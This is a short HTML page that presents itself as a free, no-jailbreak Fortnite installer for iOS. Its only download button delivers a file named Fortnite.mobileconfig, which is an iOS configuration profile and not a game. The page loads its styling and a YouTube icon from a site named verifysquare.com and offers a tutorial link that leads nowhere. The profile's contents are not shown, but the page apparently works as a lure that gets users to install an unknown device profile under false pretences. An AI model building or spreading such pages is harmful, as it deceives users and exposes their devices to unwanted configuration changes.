<!DOCTYPE html>
<html lang="en">
<head>

<link rel="stylesheet" href="https://verifysquare.com/css/main.css">
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Fortnite Install</title>
    <style>
        body {
            font-family: 'Arial', sans-serif;
            text-align: center;
            background-color: #f0f0f0;
            margin: 0;
            padding: 0;
        }

        h1 {
            color: #333;
        }

        p {
            color: #555;
        }

        a {
            text-decoration: none;
        }

        button {
            display: inline-block;
            padding: 10px 20px;
            font-size: 16px;
            font-weight: bold;
            color: #fff;
            background-color: #3498db; /* Blue color */
            border: none;
            border-radius: 25px; /* Rounded corners */
            cursor: pointer;
        }

        button:hover {
            background-color: #2980b9; /* Darker blue color on hover */
        }
    </style>
</head>
<body>

    <h1>Fortnite iOS Install </h1>
    <p>Click the button below to install Fortnite on your device for Free without jailbreak .</p>
    <a href="">
	                   <small>
	                        Having Trouble?  <img class="yt-danger" src="https://verifysquare.com/img/yt.png" alt="Youtube"> Watch This Tutorial
	                    </small>
                        </a>

	                </div>

    <a href="Fortnite.mobileconfig" download="Fortnite.mobileconfig">
        <button>Install Fortnite</button>
    </a>
</body>
</html>
